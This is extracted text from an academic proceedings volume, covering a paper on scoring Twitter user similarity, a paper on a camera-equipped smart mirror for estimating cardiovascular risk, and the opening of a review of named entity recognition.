SimTotal (Ai , A j ) = (Simm (Ai , A j ) × weightm )
m=1
Input User (Ai ) − User whose similarity has to be found.
Test User (A j ) − User to whom the similarity is being found.
Simm − Score produced by m th parameter for users Ai and A j .
This part shows all the parameters in detail that are used to find similarity between
two users.
Parameter 1: Followers and Following Relationship
The first parameter that is being used for determining the similarity score is the
follower and following relationship. The number of same accounts both the input
A Contextual Framework to Find Similarity … 799
user and test user follow is directly related to how similar their interests and views
probably are to compute this parameter and first make a list of all the followers of
the accounts in the following list of the input user and another list of following of
followers list of the input user.
Once these two lists are made, check the number of times the test user’s account
shows up in these lists. Every time the account shows up, it adds one point to the
score for the parameter. User has k following and n following of the input user; then,
the total list will be k+n; thus, if the account shows in every list, the max score will
be p+q.
For example, in our case study dataset, the input user, @TomSegura, has 1400 fol-
lowers and 140 following profiles. This means a total of 1540 total lists exist where
the test user’s name has to be checked.
Parameter 2: Mentions
Similarity from mentions is one of the parameters that is being considered in the
proposed formula. If a user mentions another in their tweets, the chances of their
similarity relationship being strong are high. However, if multiple accounts are men-
tioned in the same tweet, this decreases the chance of them being strongly related.
Thus using the formulas shown in Table 1, the mention similarity score is calculated
according to the count of times an account is mentioned and the number of accounts
that are mentioned with it. For example, if Tom mentions an account in one of his
tweets, the number of times he mentions that account in that thread is divided by
the number of accounts mentioned in that particular thread to get the score for the
parameter.
Parameter 3: Retweet Similarity
Retweet similarity is the next parameter in the similarity score calculation. A person
retweets someone’s tweet only if the content of that tweet resonates with them at
some level. This increases the chance that the two are similar. Hence for every tweet
of the test user that is retweeted by the input user, it adds one point to the parameter
score. Retweets were extracted using the Twitter API, and the number of times a
particular account’s tweets have been retweeted is the score of the parameter.
Parameter 4: Like Similarity
Like similarity is one of the parameters in the formula. Examining which tweets
the user likes and if they like any other users tweet usually means they like the
subject matter in the tweet, from this it can be said that these users have something
in common, and there is a chance that they might have similar views. The similarity
score of this parameter is calculated using the formula, and a point is added for every
tweet of the test user liked by the input user. As liking posts on Twitter is a very
common activity, a rather small weight is assigned to this parameter to give it less
importance. Likes were extracted using the Twitter API, and the number of times a
particular account’s tweets have been liked is the score of the parameter.
Parameter 5: Common Hashtags
In this parameter, all the tweets using common hashtags are selected. After getting all
the tweets, sentiment analysis is done. Through that, a negative, neutral, and positive
800 S. Dahiya et al.
score is generated for the tweet. Tweets from both the accounts are compared, and the
ones with common hashtags are extracted. Then, sentiment analysis is done on the
text to see if the content of the tweet is positive, negative, or neutral using Stanford
Core NLP, as both users’ viewpoints may not be the same. The final score of the
parameter is then calculated using the formula in the table.
Parameter 6: Common Interests
Common interests is one of the parameters being used to determine the score for
similarity. Text for each user’s tweets is extracted, and then the topmost used words
are found. These words were then checked in a dictionary containing words related
to topics and subtopics such as politics, entertainment, literature, area, and cooking,
and the person’s top five interests are obtained. The top five interests of both accounts
are then compared, and each matching interest accounts for one point; this gives us
the score for the common interest parameter.
Parameter 7: Profile Similarity
Profile similarity is one of the parameters being used to determine the final similarity
score. It consists of three factors, which are: location, gender, and language. As the
profile’s gender information is not obtainable through Twitter, it was based on the
person’s name. Each matching factor contributes one point to the parameter score.
Through this, the language information from the language usually used in the tweets
is found.
Parameter 8: Topic and List Similarity
The topic similarity is the parameter calculating the number of topics followed by
both, the input user and the test user. The higher the number of topics followed by
both users indicates a higher similarity in content consumed by both on a regular
basis. One common topic in both lists contributes one point to the score. The same
is done for the lists followed by both. The final score is then the summation of the
number of the same topics and lists followed by the users.
For simulation of proposed framework, the code is written in Python 3.9.0 in Jupyter
Notebook 5.7.4 with the hardware specification as GPU: Intel Iris Plus Graphics 645
1536 MB, processor: Quad-Core Intel Core i5 Processor, speed: 1.4 GHz, number of
processors: 1, and total number of cores: 4.
As mentioned earlier, eight parameters are being used to find the similarity between
users. Every parameter generates some score, but for getting the score, data need to
A Contextual Framework to Find Similarity … 801
be extracted to work upon. For each user, data of 8 parameters are extracted for the
calendar year 2020 using Twitter’s API.
So for extracting these data, Twitter API is being used. The extracted data are from
October 2019 to October 2020. These are some APIs that are used.
1. Followers API
2. Liked tweet API
3. Retweet API.
The Twitter API empowers automatic admittance to Twitter in cutting edge and
exceptional manners. It gets used to analyze, learn, and interact with tweets.
It is difficult to measure the similarity between users, and measuring similarity among
users of social media is a rather demanding task as their similarity needs to be judged
based on the content that they have posted or shared on their social media site;
therefore, it is a challenging task to find similarities between users as those users
should be active users on Twitter. The method should work for any average user on
Twitter as it is only dependent on their dataset.
To demonstrate this, a varied set of accounts have been selected from the fields of
entertainment and politics to create a diverse group for our dataset. Each input user
has been compared to the three test users individually, and their percentage similarity
is computed using the parameter scores and the weights assigned to each parameter.
The results of this case study were then compared to a survey of human judges who
decided the similarity of the accounts by arranging them in a descending order of
similarity. We compared this to a similar list made using the percentage similarities
calculated using our proposed methodology, the results of which were found to be
promising.
For analyzing if the method is correct, it has been applied on 2 input users and 3
test users. In this case, the 2 input users are:
@TomSegura—Tom Segura Jr. is a stand-up comedian, writer, and podcaster.
- https://en.wikipedia.org/wiki/TomSegura.
@JoeBiden—Joe Biden is an American politician serving as the 46th and current
president of the USA.
- https://en.wikipedia.org/wiki/JoeBiden
And 3 test users are:
@BertKreischer—Bert Kreischer is a stand-up comedian and reality television
host
- https://en.wikipedia.org/wiki/BertKreischer
@Seanseaevans—Sean Evans is an American producer and YouTuber who is
best recognized for the series Hot Ones.
- https://en.wikipedia.org/wiki/SeanEvans.
802 S. Dahiya et al.
This paper presents a system to calculate the percentage similarity of two users on
Twitter. This system takes the profile ID of the users and finds their similarity. If
two users are similar by 25–45 percentage, this means they are quite similar in their
content. While explaining our case study, Tom and Bert are from the same industry
and work together on certain projects, and they should be similar to each other which
is verified by the result that they are 33.5% percentage similar; this means they are
similar users. For the second test user @JoeBiden, it is apparent that he would have
a high similarity percentage to @KamalaHarris’s account as they work closely and
talk about very similar subjects on Twitter.
Using this method, the conclusion reached is that @JoeBiden’s account is
44.44% similar to @KamalaHarris’ account. On the other hand on comparing with
@BertKreisher’s account, a value of 8.02% is justified as they are from completely
different professions and talk engage is very different topics of conversation on
Twitter. Similarly, @TomSegura and @KamalaHarris are not from the same indus-
try either and so their similarity score of 11.40% is also justified. Hence, it is visible
now that this method is effective for finding similarities between Twitter users.
The parameters found have been made in such a way to be easily be used in other
similar social media Web sites. For example, Twitter accounts can be replaced by
Instagram, Facebook, or Snapchat accounts. Tweets can be substituted for profile
bios. In our methodology, “likes” and “shares” from Facebook can be considered
the same as “favorites” and “retweets,” while concepts such as mentions, hashtags,
and replies have almost identical counterparts in these Web sites. Hence with a few
A Contextual Framework to Find Similarity … 803
tweaks, this methodology can be used to calculate the percentage similarity of social
media users on various other social media platforms.
Five hundred and twenty-four volunteers were asked to create a list of the test
users, @Bertkreischer, @Seanseaevans, and @Kamalaharris in decreasing similarity
to @Tomsegura and @Joebiden. The results of the survey are compared with a list
made using the percentage similarity calculated using the proposed methodology.
According to the survey results, 92.75% and 87.64% of the volunteers got results
identical to ours. By the technique of mathematical induction, it can be said that this
method works for the majority of users on Twitter as shown, and it produces a fairly
accurate result in our case study consisting of a selection of varied accounts.
This paper proposes a methodology to find percentage similarity between two users.
This similarity percentage is calculated using eight parameters which are retweets,
liked tweets, followers, following, common hashtags, mention similarity, common
interest, common topic, and list and profile similarity of two Twitter users. Further
work can be done on assigning weights and adding more parameters to better further
this technique.
For comparing its performance, a dataset of 5 users was used, with users from the
fields of entertainment and politics. On comparing the results obtained by the survey,
this method was found to be more efficient and effective than previously done works.
Therefore, this is a highly favorable technique for various real-world applications
such as curating advertisements for users based on interests, recommending content
similar to what is normally consumed by the user, and similar account suggestions.
References
1. Goel, A., Sharma, A., Wang, D., & Yin, Z. (2013). Discovering similar users on Twitter.
Chicago, USA: In Workshop on Mining and Learning with Graphs.
2. Razis, G., & Anagnostopoulos, I. (2016). Discovering similar Twitter accounts using semantics.
Engineering Applications of Artificial,. Intelligence.
3. Vathi, E., Siolas, G., & Stafylopatis, A. (2015). Mining interesting topics in Twitter communi-
ties. In Computational Collective Intelligence. Berlin: Springer.
4. Kamath, K., Sharma, A., Wang, D., & Yin, Z.: RealGraph: User interaction prediction at Twitter.
In Presented at the User Engagement Optimization workshop@ KDD.
5. Dean, J., & Ghemawat, S. (2008). MapReduce: Simplified data processing on large clusters.
Commun ACM.
6. Smith, C. (2016). 170+ Amazing Twitter statistics. DMR.
7. Word Lists by Theme. Wordbanks–EnchantedLearning.com.
8. Gupta, P., Goel, A., Lin, J., Sharma, A., Wang, D., & Zadeh, R., WTF: The who to follow
service at Twitter. In Proceedings of the 22nd International Conference on World Wide Web,
New York, NY, USA.
A Contextual Framework to Find Similarity … 805
9. Socher, R., et al. (2013). Recursive deep models for semantic compositionality over a senti-
ment treebank. In Proceedings of the Conference on Empirical Methods in Natural Language
Processing (EMNLP) (Vol. 1631, p. 1642).
10. Macskass, S. A. (2010). Discovering users topics of inter-est on twitter: A first look. In Pro-
ceedings of the Fourth Workshop on Analytics for Noisy Unstructured Text Data
11. Singh, K. (2016). Clustering of people in social network based on textual similarity. Elsevier
GmbH.
12. Xu, Z. (2011). Discovering user interest on twitter with a modified author-topic model.
13. H. AlMahmoud, & S. AlKhalifa (2018). TSim: A system for discovering similar users on
Twitter.
14. Kalra, S., Johari, R., Dahiya, S., & Yadav, P. (2018). WAPiS: WhatsApp pattern identifica-
tion algorithm indicating social connection. Advanced Computational and Communication
Paradigms.
15. Mohta, A., Jain, A., Saluja, A., & Dahiya, S. (2020). Pre-processing and Emoji Classification of
WhatsApp Chats for Sentiment Analysis Fourth International Conference on I-SMAC. Mobile,
Analytics and Cloud) (I-SMAC: IoT. in Social.
16. Dahiya, S., Mohta, A., & JainText, A. (2020). Classification based behavioural analysis of
WhatsApp chats. In 5th International Conference on Communication and Electronics Systems
(ICCES).
17. Kanungsukkasem, N., & Leelanupab, T. (2016). Power of crowdsourcing in Twitter to find
similar/related users. In 13th International Joint Conference on Computer Science and Software
Engineering (JCSSE).
18. Jiang, J., Lu, H., Li, P., Pan, G., & Xie, X. (2017). Finding influential local users with similar
interest from geo-tagged social media data. In 18th IEEE International Conference on Mobile
Data Management (MDM).
19. Wu, C., Wu, J., Luo, C., Wu, Q., Liu, C., Wu, Y., et al. (2019). Recommendation algorithm based
on user score probability and project type. EURASIP Journal on Wireless Communications and
Networking,.
20. Ahmad, W., & Ali, R. (2018). Understanding the users personal attributes selection tendency
across social networks. In 3rd International Conference On Internet of Things: Smart Innova-
tion and Usages (IoT-SIU).
On the Design of a Smart Mirror for
Cardiovascular Risk Prediction
Gianluca Zaza
1 Introduction
Cardiovascular diseases (CVDs) are one of the main causes of death in the world.
Indeed, the World Health Organization (WHO)1 estimated that in 2016 almost 18
million of deaths were caused by cardiovascular problems. Specifically, the term
1 https://www.who.int/news-room/fact-sheets/detail/cardiovascular-diseases-(cvds).
G. Zaza (B)
Department of Computer Science, University of Bari, Bari, Italy
e-mail: gianluca.zaza@uniba.it
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 807
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_65
808 G. Zaza
CVD includes different disorders that affect the cardiovascular system such as coro-
nary artery disease, cerebrovascular disease, heart attacks, strokes etc. Three are the
main factors that could cause CVDs: unhealthy diets, excessive use of tobacco, and
physical inactivity. Thus, one way to limit CVDs is to promote an healthy life but
the prevention is equally important. On one hand, promoting an healthy life means
carrying out global policies that include, for example, taxing the consumption of
high-sugar foods, building walking, and cyclepaths, providing healthy school meals
in children’s classrooms, etc. On the other hand, education is necessary to prevent
CVD. Particularly, citizens should be aware of the conditions suggesting the onset
of an emergency.
Moreover, monitoring of heart rate, breathing rate, and blood oxygen saturation,
that are the three vital parameters mainly involved in the cardiovascular process, is
necessary to detect in time the worsening of the disease [1].
Usually two medical devices, such as electrocardiogram (ECG) and pulse oxime-
ter, are used to measure these parameters. ECG is a medical device that graphically
records the electrical activity of the heart and its rhythm. The measurements through
ECG require the presence of medical experts to manage the device. On the contrary,
pulse oximeter is a small device that is commonly used for acquiring the measure-
ments from the fingers. It is based on the photoplethysmography (PPG) technology
[2]. A light source is used to illuminate the tissue (e.g., skin) and a photodetector
to measure the small changes in light intensity associated with changes in blood
volume. Both the devices need to be in contact with the skin for a correct measure-
ment. In recent years, thanks to the advancement of technology in the field of digital
cameras and image processing, the measurement of vital parameters through a new
methodology, called remote photoplethysmography (rPPG), has been possible [3]. It
is based on the same technology of PPG but it uses a camera as a photodetector and
the ambient light as a light source, thus avoiding contact. This characteristic allows
new monitoring scenarios where there is no need of contact between the subject and
the measurement devices, and it also does not require the presence of medical experts,
thus it is suitable for telemedicine applications, where parameters are remotely and
continuously acquired and then stored in databases accessed by medical staff only
[4–7].
This paper provides a synthetic description of the ongoing PhD research activity
of the author.
A non-contact vital signs monitoring system based on a see-through mirror has
been proposed. It is equipped with a camera, that captures video frames on patients’
faces. The rPPG signals extracted from the video frames are processed for measuring
heart rate (HR), breathing rate (BR), blood oxygen saturation (SpO2) and the color of
lips. These data are used by a Hierarchical Fuzzy Inference System (HFIS), embedded
in the smart object, for cardiovascular risk level estimation. The goal is to create a
telemedicine solution for domestic use that is both cheap and easy to use.
The rest of the paper is organized as follows: a literature review on rPPG systems
and fuzzy inference systems for CVD is detailed in Sect. 2. From the analysis of the
state-of-the-art research five gaps are pointed out (Sect. 3), and the research goals are
outlined (Sect. 4). Three main hypotheses are then defined (Sect. 5). The proposed
On the Design of a Smart Mirror for Cardiovascular … 809
methodology and the results are reported in sections (Sect. 6) and 7. Finally Sect. 8
concludes this work by outlining future directions.
2 Literature Review
Two main components are critical for the smart mirror that has been proposed:
the measurements module (through rPPG) and the inference system (through FIS).
The state-of-the-art methodologies for these two modules will be described in the
following, by highlighting their limits.
A pioneering work on rPPG was proposed by Verkruysse et al. [3], where it is
described how vital signals can be extracted through video images captured by a
camera. Moreover, Poh described how to use image processing techniques and blind
source separation to obtain the signal from the captured video frames [8]. Takano et
al. [9] have used a charge coupled device (CCD) camera for measuring heart rate and
respiratory rate from a person’s face. In [10], a Microsoft device KinectTM version
2.0 is used to capture vital parameters in real time. While in [11] the camera is used in
a specific real-world context, that is for car drivers’ parameters detection. However,
these works while providing non-invasive monitoring they are difficult to apply in a
real-world setting such as a smart homes.
The first attempt in developing an easy-to-use solution, through the use of a mobile
phone is described in [12]. However, its use could be uncomfortable for elderly
people, since they need continuous monitoring of their vital parameters, and they are
not used to modern technologies. An interesting solution that overcomes these limits
is proposed in [13], where a mirror for monitoring of semeiotic facial signals related
to cardio-metabolic risk is described, and it is shown how this daily object encourages
the users in improving their lifestyle. However, it consists of several sensors, that
make it very difficult to install in a real domestic scenario. On the contrary, the
proposed device is meant for overcoming all the previously described issues. Indeed,
a smart mirror has been developed, that thanks to a camera embedded in its structure,
is able to acquire video frames of the subjects and thus to derive the vital parameters
measurements. While as in [13], the choice of a common object enhances the users
willingness to use it, low-cost components have been used, and a ready to use smart
object is proposed, thus avoiding hardware and software configurations.
Afterward, the data collected are sent to a Fuzzy Inference System (FIS) that
returns cardiovascular risk level. FISs have shown to be very useful and reliable in
the medical field because of their ability to manage uncertainty and vagueness that
are proper of this domain [14]. Thanks to their generality, they have been used as
decision support systems for different diseases, such as diabetes [15], eye diseases
[16], hypertension [17], and neurodegenerative diseases [18–20], just to mention
few.
With the aid of medical experts, a FIS for cardiovascular risk level estimation has
been proposed in [21]. While the accuracy of the defined FIS was high, the number of
rules grew exponentially with the number of the input variables, hence the resulting
810 G. Zaza
rule base was quite complex. Reducing the number of rules is mandatory in order to
improve interpretability [22]. So, in order to solve the “curse of dimensionality” that
occurs in flat FISs, HFISs have been effectively used in several fields [23]. However,
very few works use HFISs in the medical field. In [24], it is used to evaluate and
measure the effects of rehabilitation in post-stroke patients while in [25] it is used to
diagnose Dengue fever. Thus, previously FIS has been improved by designing and
implementing an HFIS for cardiovascular risk assessment.
3 Research Gaps
With regard to the two components described in Sect. 2, five main gaps have been
identified in state-of-the-art approaches:
G 1 : They are no suitable for a daily use in a smart home scenario where the user
easily adopts the device in his normal routine;
G 2 : The mirrors for parameters estimation do not measure blood oxygen saturation;
G 3 : Several telehealth systems for cardiovascular measurements have been pro-
posed, however they focus on the technical issues related to data privacy and
communication while ignoring the measurements of the parameters that are per-
formed with common devices;
G 4 : Fuzzy logic is suitable to describe medical concepts and reasoning about them.
However, the number of rules in flat FISs grows with the number of input vari-
ables, thus techniques for reducing their complexity are needed. To this aim,
HFISs have proven to be effective, however few works use them in the medical
domain, and none of them focus on cardiovascular disease;
G 5 : Usability and acceptability are two crucial issues when dealing with users that
are no technicians, and they enhance the user trustability of the automatic devices.
There are no works that explore this aspect in smart objects for cardiovascular
decision support systems.
4 Objectives
Starting from the research gaps that have been identified in the previous phase, five
research objectives have been defined.
O1 : Develop a contactless and easy-to-use smart device for cardiovascular risk
assessment, that can be used during the daily routine at home;
O2 : Develop a smart mirror that is able to measure four vital parameters, namely
heart rate, breath rate, blood oxygen saturation, and color of lips;
O3 : Embed the smart mirror in a telemedicine environment;
O4 : Define a Hierarchical Fuzzy Inference System for cardiovascular risk assess-
ment;
On the Design of a Smart Mirror for Cardiovascular … 811
5 Hypothesis
On the basis of the research gaps and the research objectives, three main hypotheses
have then been defined and they will be verified in the following paragraph.
H1 : A smart mirror is able to accurately measure the four vital parameters, useful
to derive cardiovascular risks. The use of rPPG, together with signal and video
processing techniques, allows contactless measurements of the parameters;
H2 : Hierarchical fuzzy inference systems are suitable predictors for cardiovascular
risk levels. Moreover, the use of HFISs, instead of flat FISs, allows the reduction
of number of rules;
H3 : The use of a common object, as the mirror is, improves the acceptability of
the new technology to users, thus enhancing its use and its effectiveness for
prevention.
6 Methodology
With regard to the hypothesis H1 a smart mirror, shown in Fig. 1, has been developed
to acquire facial video frames used to extract the rPPG signal and then the four
vital parameters defined before. Cheap components have been used for the hardware
architecture: a monitor to show messages, acrylic film that is partially reflective and
transparent, a wood frame, and a camera [26, 27]. The current prototype is based on
a client/server architecture that is used for processing.
A software pipeline has then been defined to process the acquired video frames
and extract vital parameters values from signals.
The processing starts with real-time face identification from short video frames
acquired through the camera. A preliminary 26 s cycle is required to correct camera
distortion and then just 2 s are necessary for each measurement. Python libraries for
video and signal processing have been used. Particularly, OpenCv2 to capture and
process video frames; Dlib with a pretrained frontal detector3 to identify the area of
the frame containing the face and facial landmark detection4 to obtain a set of 68
facial landmarks [28]. Then three region of interests (ROIs) are selected based on
their significance in blood passage modulation, and a fourth ROI is used to reduce
signal distortion due to facial movements.
The RGB signals coming from the ROIs are used to estimate the vital parameters.
Particularly, a signal matrix is obtained by averaging the pixels of each RGB chan-
2 https://pypi.org/project/opencv-python/.
3 http://dlib.net/.
4 http://dlib.net/imaging.html#shape_predictor.
812 G. Zaza
Table 1 Mean absolute error and standard deviation obtained by comparing our contactless system
and the pulse oximeter
All subjects Healthy subjects Unhealthy subjects
HR 3.45 ± 2.93 2.87 ± 2.39 4.90 ± 3.74
SpO2 1.83 ± 2.43 1.54 ± 1.76 2.56 ± 3.63
nels and of each ROI. Afterward, noise reduction techniques as the Finite Impulse
Response [29], the Chrominance method [30] and linear interpolation are used to
obtain a more robust signals. Finally, the most informative ROI is used to evaluate
the vital signals as suggested in [3, 8, 31]. Lip color was obtained by extracting and
analyzing a specific ROI that includes the mouth. K-means algorithm was applied
to quantify the predominant color in the ROI, from the resulting three main colors
in RGB format. With respect to H2 , an HFIS was developed starting from a flat FIS
rule base defined with the help of a clinician in [21]. The linguistic variables and
the related fuzzy sets have been modeled by using the FISDET tool [32]. The HFIS
consists of three FISs organized in a hierarchical fashion. Each FIS has two input
variables and one output variable. Intermediate input/output variables have been used
between the three levels. The final output is provided by the last layer. and it repre-
sents the cardiovascular risk level. On the overall, HFIS rules base include 27 rules
instead of 81 that were defined in the flat FIS.
With respect to H3 Technology Acceptance Model (TAM) was used and in vivo
experiments have been conducted to evaluate the acceptability of the new technology
to final users. A questionnaire, was defined, according with the TAM methodology,
and users were asked to fill it, after having used the smart mirror [33].
7 Interpretation of Results
With regard to the hypothesis H1 , experiments have been conducted in order to verify
the effectiveness of the proposed smart mirror in measuring the four vital parameters.
The values of HR and SpO2 obtained with our system have been compared with
those measured by pulse oximeter, that is used as baseline. Breath rate and lips
color accuracy, could have not been evaluated, since there is not a gold standard
to compare them with. In-vivo experiments were conducted, subjects were required
to sit in front of the mirror, at a distance of about 50 cm. Measurements with the
smart mirror and the pulse oximeter have been conducted simultaneously, for a fair
comparison. Results have shown that the two measurements are in agreement since
a good correlation is obtained [26].
Moreover, since blood oxygen saturation is a good marker for COVID-19 pres-
ence, further experiments have been conducted by considering only this parameter.
Also, in this case, a high level of agreement has been obtained between the system
measurements and the baseline [34].
With regard to the hypothesis H2 , experiments have been conducted to compare
the performance of the defined HFIS and its flat FIS version [21], in terms of accu-
racy and number of rules. A dataset of 116 subjects was collected and labeled by
experts, assigning a risk level (Low, Medium, High, Very High). A total of 12 HFIS
configurations was firstly created by combining all the input variables. Then, the best
HFIS has been compared with the flat FIS, and overall accuracy values of 71.55%
and 69.97% were obtained, respectively [35]. Table 2 shows the classification per-
formance of both FIS and HFIS, for each risk level, in terms of accuracy (ACC),
True Positive and Negative Rate (TPR, TNR) and Positive and Negative Predictive
Values (PPV, NPV). As overall evaluation, we observe that HFIS performs better
for extreme risk classes than the original FIS. In light of total better accuracy and
focusing on the major importance of discriminating extreme classes in the context
of cardiovascular disease domain, HFIS has been preferred to FIS. Moreover, as
previously said, the number of rules has been drastically reduced thus enhancing
the explainability of the inference system. With regard to H3 , 30 subjects have been
involved in the study through TAM. Six main research questions were identified
regarding social and demographic factors, benefits, risks and privacy, usability and
acceptance, and for each of them a set of questions were defined according to the
TAM guidelines. Results in Fig. 2 have shown a general positive feeling toward our
self-care monitoring solution, both among young and old people [33].
8 Conclusion
In this work, a smart mirror that is able to measure vital sign parameters from short
video frames of the user’s face has been developed. Moreover, a Hierarchical Fuzzy
Inference System has been designed with the aim of medical experts, in order to
automatically predict the cardiovascular risk level, from the analysis of the measured
parameters. Experiments have shown the effectiveness of the proposed approach in
both the measurement and predictive tasks. Moreover, since the stakeholders are not
necessary technicians, the acceptability of this new technology has been evaluated
through TAM and positive results have been collected.
Future works will be addressed to conduct massive experiments in hospitals and
medical facilities in order to learn rules and fuzzy sets through a neuro-fuzzy sys-
tem [36]. Moreover, a telemedicine system which embeds the smart mirror will be
developed, as defined in objective O3 .
References
1. Cook, S., Togni, M., Schaub, M. C., Wenaweser, P., Hess, O. M. (2006). High heart rate: A
cardiovascular risk factor? European Heart Journal, 27(20), 2387–2393
2. Allen, J. (2007). Photoplethysmography and its application in clinical physiological measure-
ment. Physiological Measurement, 28(3), R1.
3. Verkruysse, W., Svaasand, L. O., & Nelson, J. S. (2008). Remote plethysmographic imaging
using ambient light. Optics Express, 16(26), 21434–21445.
4. Alzubi, J., Manikandan, R., Alzubi, O., Gayathri, N., & Patan, R. (2019). A survey of specific
iot applications. International Journal on Emerging Technologies, 10(1), 47–53.
On the Design of a Smart Mirror for Cardiovascular … 815
5. Alzubi, J., Selvakumar, J., Alzubi, O., & Manikandan, R. (2019). Decentralized internet of
things. Indian Journal of Public Health Research and Development, 10(2), 251–254.
6. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
7. Abdulkareem, K. H., Mohammed, M. A., Salim, A., Arif, M., Geman, O., & Gupta, D., et al.
(2021). Realizing an effective covid-19 diagnosis system based on machine learning and iot in
smart hospital environment. IEEE Internet of Things Journal, 1–1.
8. Poh, M. Z., McDuff, D. J., & Picard, R. W. (2010). Non-contact, automated cardiac pulse mea-
surements using video imaging and blind source separation. Optics Express, 18(10), 10762–
10774.
9. Takano, C., & Ohta, Y. (2007). Heart rate measurement based on a time-lapse image. Medical
Engineering & Physics, 29(8), 853–857.
10. Bosi, I., Cogerino, C., & Bazzani, M. (2016). Real-time monitoring of heart rate by processing of
microsoft kinectTM 2.0 generated streams. In 2016 International Multidisciplinary Conference
on Computer and Energy Science (SpliTech), pp. 1–6
11. Zhang, Q., Wu, Q., Zhou, Y., Wu, X., Ou, Y., & Zhou, H. (2017). Webcam-based, non-contact,
real-time measurement for the physiological parameters of drivers. Measurement, 100, 311–
321.
12. Scully, C. G., Lee, J., Meyer, J., Gorbach, A. M., Granquist-Fraser, D., Mendelson, Y., et al.
(2012). Physiological parameter monitoring from optical recordings with a mobile phone. IEEE
Transactions on Biomedical Engineering, 59(2), 303–306.
13. Colantonio, S., Coppini, G., Germanese, D., Giorgi, D., Magrini, M., Marraccini, P., Martinelli,
M., Morales, M. A., Pascali, M. A., Raccichini, G., Righi, M., Salvetti, O. (2015). A smart
mirror to promote a healthy lifestyle. Biosystems Engineering, 138, pp. 33–43. Innovations in
Medicine and Healthcare.
14. Alonso, J. M., Castiello, C., Lucarelli, M., Mencar, C. (2013). Modeling interpretable fuzzy
rule-based classifiers for medical decision support. In Data mining: Concepts, methodologies,
tools, and applications, (pp. 1064–1081). IGI global
15. Lee, C., & Wang, M. (2011). A fuzzy expert system for diabetes decision support application.
IEEE Transactions on Systems, Man, and Cybernetics, Part B (Cybernetics), 41(1), 139–153
16. Ibrahim, F., Ali, J. B., Jaais, A. F., Taib, M. N. (2001). Expert system for early diagnosis of eye
diseases infecting the malaysian population. In Proceedings of IEEE Region 10 International
Conference on Electrical and Electronic Technology. TENCON 2001 (Cat. No.01CH37239).
Vol. 1. pp. 430–432.
17. Das, S., Ghosh, P., Kar, S. (2013). Hypertension diagnosis: A comparative study using fuzzy
expert system and neuro fuzzy system. In 2013 IEEE International Conference on Fuzzy
Systems (FUZZ-IEEE) (pp. 1–7)
18. Lella, E., & Vessio, G. (2020). Ensembling complex network ‘perspectives’ for mild cognitive
impairment detection with artificial neural networks. Pattern Recognition Letters, 136, 168–
174.
19. Vessio, G. (2019). Dynamic handwriting analysis for neurodegenerative disease assessment:
A literary review. Applied Sciences, 9(21), 4666.
20. Lella, E., Pazienza, A., Lofù, D., Anglani, R., & Vitulano, F. (2021). An ensemble learning
approach based on diffusion tensor imaging measures for alzheimer’s disease classification.
Electronics, 10(3), 249.
21. Casalino, G., Castellano, G., Castiello, C., Pasquadibisceglie, V., Zaza, G. (2019). A fuzzy
rule-based decision support system for cardiovascular risk assessment. In R. Fullér, S. Giove,
F. Masulli (Eds.), Fuzzy logic and applications, (pp. 97–108)
22. Mencar, C., Castellano, G., Fanelli, A. M. (2005). Some fundamental interpretability issues in
fuzzy modeling. In EUSFLAT Conference, pp. 100–105.
23. Kerr-Wilson, J., & Pedrycz, W. (2020). Generating a hierarchical fuzzy rule-based model.
Fuzzy Sets and Systems, 381, 124–139.
816 G. Zaza
24. Prokopowicz, P., Mikolajewski, D., Mikolajewska, E., & Tyburek, K. (2017). Modeling
trends in the hierarchical fuzzy system for multi-criteria evaluation of medical data. In
EUSFLAT/IWIFSGN.
25. Alrashoud, M. (2019). Hierarchical fuzzy inference system for diagnosing dengue disease.
In 2019 IEEE International Conference on Multimedia & Expo Workshops (ICMEW), (pp.
31–36).
26. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Contact-less real-time
monitoring of cardiovascular risk using video imaging and fuzzy inference rules. Information,
10(1), 9.
27. Pasquadibisceglie, V., Zaza, G., & Castellano, G. (2018). A personal healthcare system for
contact-less estimation of cardiovascular parameters. In AEIT International Annual Confer-
ence. IEEE, 2018, 1–6.
28. Kazemi, V., & Sullivan, J. (2014). One millisecond face alignment with an ensemble of regres-
sion trees. In 2014 IEEE Conference on Computer Vision and Pattern Recognition, pp. 1867–
1874
29. Speake, T., & Mersereau, R. (1981). A note on the use of windows for two-dimensional fir
filter design. IEEE Transactions on Acoustics, Speech, and Signal Processing, 29(1), 125–127.
30. De Haan, G., & Jeanne, V. (2013). Robust pulse rate from chrominance-based rppg. IEEE
Transactions on Biomedical Engineering, 60(10), 2878–2886.
31. Kong, L. K. et al. (2013). Non-contact detection of oxygen saturation based on visible light
imaging device using ambient light. Optics express, 21 15, 17464–71
32. Castellano, G., Castiello, C., Pasquadibisceglie, V., & Zaza, G. (2017). Fisdet: Fuzzy inference
system development tool. International Journal of Computational Intelligence Systems, 10(1),
13–22.
33. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Evaluating end-user
perception towards a cardiac self-care monitoring process. In International Conference on
Wireless Mobile Communication and Healthcare (pp. 43–59). Springer.s
34. Casalino, G., Castellano, G., & Zaza, G. (2020). A mhealth solution for contact-less self-
monitoring of blood oxygen saturation. In IEEE Symposium on Computers and Communica-
tions (ISCC). IEEE, 2020, 1–7.
35. Casalino, G., Grassi, R., Iannotta, M., Pasquadibisceglie, V., & Zaza, G. (2020). A hierarchical
fuzzy system for risk assessment of cardiovascular disease. In 2020 IEEE Conference on
Evolving and Adaptive Intelligent Systems (EAIS). IEEE (pp. 1–7)
36. Mencar, C., Castellano, G., & Fanelli, A. M. (2005). Deriving prediction intervals for neuro-
fuzzy networks. Mathematical and Computer Modelling, 42(7–8), 719–726.
Named Entity Recognition in Natural
Language Processing: A Systematic
Review
Abstract The enormous growth and availability of data poses a great challenge
for extracting useful information from documents written in natural language. The
information extraction task has become a vital activity in all domains. The process
of identifying the names of organization, people, locations or other entities in text
is called named entity recognition (NER). It is the subtask and plays an important
part to discover and classify the names such as organization name, person name or
the location. This is one of the trending fields and most important step in the natural
language processing (NLP) for analysis of text. Research on NER changed a lot in the
